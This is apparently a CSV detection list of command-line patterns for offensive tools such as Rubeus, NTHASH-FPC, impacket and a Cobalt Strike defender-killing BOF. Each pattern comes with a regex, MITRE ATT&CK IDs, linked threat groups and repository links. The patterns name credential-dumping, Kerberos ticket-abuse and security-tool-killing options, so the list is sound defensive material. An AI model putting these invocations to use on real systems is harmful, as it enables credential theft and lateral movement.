"* /creduser:* /credpassword:*",".{0,1000}\s\/creduser\:.{0,1000}\s\/credpassword\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","60"
"* /decodemk /binary:* /password:*",".{0,1000}\s\/decodemk\s\/binary\:.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","61"
"* /domain:* /dc:* /getcredentials /nowrap*",".{0,1000}\s\/domain\:.{0,1000}\s\/dc\:.{0,1000}\s\/getcredentials\s\/nowrap.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","62"
"* /dumpsecret /input:* /system*",".{0,1000}\s\/dumpsecret\s\/input\:.{0,1000}\s\/system.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","63"
"* /dumpsecret /input:defaultpassword*",".{0,1000}\s\/dumpsecret\s\/input\:defaultpassword.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","64"
"* /dumpsecret /input:dpapi_system /offline*",".{0,1000}\s\/dumpsecret\s\/input\:dpapi_system\s\/offline.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","65"
"* /gethmac /mode:hashid /input:* /key:*",".{0,1000}\s\/gethmac\s\/mode\:hashid\s\/input\:.{0,1000}\s\/key\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","69"
"* /GetKeys WirelessKeyView*",".{0,1000}\s\/GetKeys\sWirelessKeyView.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","70"
"* /getlsasecret /input:*",".{0,1000}\s\/getlsasecret\s\/input\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","71"
"* /getntlmhash /password:*",".{0,1000}\s\/getntlmhash\s\/password\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","72"
"* /getntlmhash | wtee *.ntlm*",".{0,1000}\s\/getntlmhash\s\|\swtee\s.{0,1000}\.ntlm.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","73"
"* /getsamkey /offline*",".{0,1000}\s\/getsamkey\s\/offline.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","74"
"* /impersonateuser:* /msdsspn:* /ptt*",".{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","75"
"* /ldap * /printcmd*",".{0,1000}\s\/ldap\s.{0,1000}\s\/printcmd.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","76"
"* /ldapfilter:'admincount=1'*",".{0,1000}\s\/ldapfilter\:\'admincount\=1\'.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","77"
"* /m:assembly /p:beacon.exe*",".{0,1000}\s\/m\:assembly\s\/p\:beacon\.exe.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","78"
"* /m:assembly /p:getMailBox.exe*",".{0,1000}\s\/m\:assembly\s\/p\:getMailBox\.exe.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","79"
"* /modules:* /target:* /linkedsql:*",".{0,1000}\s\/modules\:.{0,1000}\s\/target\:.{0,1000}\s\/linkedsql\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","N/A","2","111","20","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z","80"
"* /NAME:* /KILL*",".{0,1000}\s\/NAME\:.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 -  TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","82"
"* /nofullpacsig *",".{0,1000}\s\/nofullpacsig\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","83"
"* /outfile:* /spn:*",".{0,1000}\s\/outfile\:.{0,1000}\s\/spn\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","84"
"* /outfile:* /spns:*",".{0,1000}\s\/outfile\:.{0,1000}\s\/spns\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","85"
"* /PID:* /DRIVER:*",".{0,1000}\s\/PID\:.{0,1000}\s\/DRIVER\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","86"
"* /PID:* /KILL*",".{0,1000}\s\/PID\:.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","87"
"* /potato.local*",".{0,1000}\s\/potato\.local.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","88"
"* /ptt /binary:*.kirbi*",".{0,1000}\s\/ptt\s\/binary\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","89"
"* /pwdsetafter:*",".{0,1000}\s\/pwdsetafter\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","90"
"* /pwdsetbefore:*",".{0,1000}\s\/pwdsetbefore\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","91"
"* /Q /C >1 \\127.0.01\ADMIN$\__*",".{0,1000}\s\/Q\s\/C\s\>1\s\\\\127\.0\.01\\ADMIN\$\\__.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","92"
"* /rc4opsec *",".{0,1000}\s\/rc4opsec\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","94"
"* /s4uproxytarget*",".{0,1000}\s\/s4uproxytarget.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","96"
"* /s4uproxytarget:* /s4utransitiedservices:*",".{0,1000}\s\/s4uproxytarget\:.{0,1000}\s\/s4utransitiedservices\:.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","97"
"* /s4utransitedservices*",".{0,1000}\s\/s4utransitedservices.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","98"
"* /service:krbtgt *",".{0,1000}\s\/service\:krbtgt\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","99"
"* /setntlm * /user:* /newhash:*",".{0,1000}\s\/setntlm\s.{0,1000}\s\/user\:.{0,1000}\s\/newhash\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","100"
"* /setntlm * /user:* /newpwd:*",".{0,1000}\s\/setntlm\s.{0,1000}\s\/user\:.{0,1000}\s\/newpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","101"
"* /simple * /spn*",".{0,1000}\s\/simple\s.{0,1000}\s\/spn.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","102"
"* /taskname:Cleanup *",".{0,1000}\s\/taskname\:Cleanup\s.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","103"
"* /ticket *.kirbi*",".{0,1000}\s\/ticket\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","104"
